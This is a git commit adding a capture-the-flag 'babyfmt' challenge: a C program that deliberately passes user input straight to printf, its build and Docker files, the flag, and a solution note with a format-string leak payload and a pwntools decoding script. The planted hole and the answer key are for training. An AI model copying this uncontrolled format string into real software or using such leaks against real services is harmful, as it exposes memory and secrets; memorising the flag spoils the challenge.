pwn(babyfmt): add chall

cybermouflons · Jul 5, 2024 · 55d2356 · 55d2356
1 parent 055afb9
commit 55d2356
Show file tree

Hide file tree

Showing 9 changed files with 134 additions and 0 deletions.
diff --git a/pwn/babyfmt/challenge.yml b/pwn/babyfmt/challenge.yml
@@ -0,0 +1,31 @@
+name: "Babyfmt"
+author: "s3nn"
+category: pwn
+
+description: |
+  What's so bad about printf()?
+
+  https://www.notion.so/apogiatzis/MSc-CTF-Pwn-9ecbafd7791a413dae7d37a24ec27fb9?p=d9b319fe6a3a4766a0033bb2607fec85&pm=s
+
+value: 500
+type: dynamic_docker
+extra:
+  initial: 500
+  minimum: 100
+  decay: 25
+  redirect_type: direct
+  compose_stack: !filecontents docker-compose.yml
+
+
+flags:
+  - GTBQ{l3ak_all_The_t1ngs!!!}
+
+files:
+  - "public/challenge"
+
+tags:
+  - pwn
+  - easy / medium
+
+state: visible
+version: "0.1"
diff --git a/pwn/babyfmt/docker-compose.yml b/pwn/babyfmt/docker-compose.yml
@@ -0,0 +1,11 @@
+services:
+  challenge:
+    restart: always
+    ports:
+      - 1337:1337
+    image: ghcr.io/cybermouflons/gtbq-2024/babyfmt:latest
+    build:
+      context: ./setup
+      dockerfile: Dockerfile
+      labels: 
+        ctf.challenge.name: babyfmt
diff --git a/pwn/babyfmt/public/challenge b/pwn/babyfmt/public/challenge
diff --git a/pwn/babyfmt/setup/Dockerfile b/pwn/babyfmt/setup/Dockerfile
@@ -0,0 +1,17 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat gcc-multilib
+
+RUN addgroup --system ctf && adduser --system --group ctf
+
+COPY ./challenge /home/ctf
+COPY ./flag.txt /home/ctf
+
+RUN chmod +x /home/ctf/challenge
+RUN chmod +r /home/ctf/flag.txt
+
+USER ctf
+WORKDIR /home/ctf
+
+EXPOSE 1337
+CMD ["socat", "-v","TCP-LISTEN:1337,reuseaddr,fork", "EXEC:'./challenge'"]
diff --git a/pwn/babyfmt/setup/Makefile b/pwn/babyfmt/setup/Makefile
@@ -0,0 +1,5 @@
+all:
+	gcc -fno-stack-protector -no-pie -o challenge ./challenge.c
+
+clean:
+	rm challenge
diff --git a/pwn/babyfmt/setup/challenge b/pwn/babyfmt/setup/challenge
diff --git a/pwn/babyfmt/setup/challenge.c b/pwn/babyfmt/setup/challenge.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+void setup(){
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stdin, NULL, _IONBF, 0);
+    fflush(stdout);
+}   
+
+int main() {
+    setup();   
+
+    FILE *fptr;
+    char flag[34];
+    fptr = fopen("flag.txt", "r"); 
+    if (fptr == NULL) 
+    { 
+        printf("Cannot open file \n"); 
+        exit(0); 
+    }
+    fgets(flag, 34, fptr);
+
+    char fake1[] = "make";
+    char fake2[] = "sure";
+    char fake3[] = "you";
+    char fake4[] = "leak";
+    char fake5[] = "allthethings";
+    char fmtstr[32] = {0};
+
+
+    printf("Plese tell us your name number: ");
+    read(0, fmtstr, 31);
+
+    printf(fmtstr);
+
+    return 0;
+
+}
+
+
+
+
diff --git a/pwn/babyfmt/setup/flag.txt b/pwn/babyfmt/setup/flag.txt
@@ -0,0 +1 @@
+GTBQ{l3ak_all_The_t1ngs!!!}
diff --git a/pwn/babyfmt/sol/sol.md b/pwn/babyfmt/sol/sol.md
@@ -0,0 +1,25 @@
+# Leak
+
+Send the following input (might be slightly different on systems)
+```
+%14$p.%15$p.%16$p.%17$p
+```
+
+# Unhex:
+
+```python
+
+from pwn import *
+
+sol = b''
+
+a = '0x61336c7b51425447.0x68545f6c6c615f6b.0x2173676e31745f65.0x7d2121'.replace('0x','')
+flag = a.split('.')
+
+for part in flag:
+    sol += unhex(part)[::-1]
+
+log.success(sol)
+
+```
+